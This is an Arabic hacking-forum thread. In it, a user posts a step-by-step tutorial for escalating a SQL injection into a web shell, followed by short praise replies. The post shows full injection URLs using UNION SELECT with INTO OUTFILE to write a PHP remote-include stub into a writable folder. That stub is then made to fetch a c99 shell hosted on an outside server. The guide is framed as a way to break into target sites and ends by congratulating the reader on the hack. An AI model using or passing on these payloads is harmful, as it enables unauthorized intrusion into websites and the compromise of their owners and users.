درس رفع الشل من خلال ثغرات السيكول sql

[Hidden pain]

السلام عليكم و رحمة الله تعلى و بركاته
-أرجو أن تكونوا في تمام الصحة و العافية-

في الكثير من الحالات نستطيع حقن الموقع لكن لا نجد الأدمن و الباس
أو يكون الباس غير قابل للكسر
أو نجدها ولا نجد مسار لوحة التحكم
أو يكون الموقع محمي بجدار ناري

أردت أن أضيف لكم معلومة ( للذين لا يعرفونها )
نستطيع أن نرفع شل من حقنة السيكول
و الطريقة كالتالي :

أولا :
يجب أن نعرف مسارنا على السرفر
و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف
--------------------------------------------------------------------
بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها
-------------------------------------------------------------------
لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف '
و سيضهر لنا مسارنا على السرفر مع جملة الخطأ
-----------------
مثال:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2
هذه جملة خطأ
ومسارنا فيها..
و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد
المهم نحفظ المسار و نتابع
---------------
الآن نأتي لكيفية معرفة الmagic quotes on أو off
لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة
ب load_file('/')
أي سيكون الإستغلال هكذا
نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب
http://www.target.com/file.php?id=-1...39;),5,6,7,8,9
و نرى
إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off
و نستطيع مواصلة عملنا
أما إذا كان ال magic quotes on
فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة
------------------------------
طيب ضهر لنا الmagic quotes off ماذا نفعل ؟
-----------------------------
نبحث عن أي شيئ مصرح بتصريح 777
-----------------------------
و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية
مثلا هذا مسار صورة www.target.com/images/image.jpg
أي سيكون مسار الملف المصرح هو /images/
الذي يأتي بعد مسارنا على السرفر طبعا
---------------------------------
نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه
'<?include("$iraq"); ?>'
و نضيف هذا الأمر في آخر السطر
into+outfile+
ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة
home/dudi/public_html/
ثم نضيف مسار الملف المصرح ب777
/images/
ثم اسم الملف المصاب المراد رفعه بإمتداد php
مثلا example.php
------------------
ليكون الاستغلال كتالي

كود PHP:

www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php"

الآن تم إشائ الملف المقصود و هو هنا

www.target.com/images/example.php
الآن المرحلة الأخيرة هي رفع الشل على صيغة txt

وذلك بالتالي

كود PHP:

www.target.com/images/example.php?iraq=http://c99.txt.tc/c99.txt? 


طبعا http://c99.txt.tc/c99.txt
هو مسار الشل بصيغة txt مرفوع جاهز

و ألف مبروك على الإختراق-----

من طرف
Hidden Pain
إهداء لجميع أعضاء منتدى جيوش الهكر الكرام

[JoKeR_pS]

يشرفني ان اكون من اول من رد علي الموضوع المتميز والله يعطيك العافيه )^_^(

[e . V . E . L]

مــبدع ...مبدع مبـــدع

لــبى قــلبك شرح رائع من عضو اروع

[Hidden pain]

لي كل الشرف بمروركما على موضوعي
شكرا لكما

[Crypto Seven]

مشكووووووووووووووور

[System 32]

رائع ابداااع مشكووووور علي الطرح الجميل

[Crypto Seven]

مشكوووووووور على الطرح الحلو

[sewase3]

موضوع متميز, الله يعطيك العافيه

[dark_ma]

tankkkkkkkkkkkkkkkkkkks

[Abedghammar]

مــبدع ...مبدع مبـــدع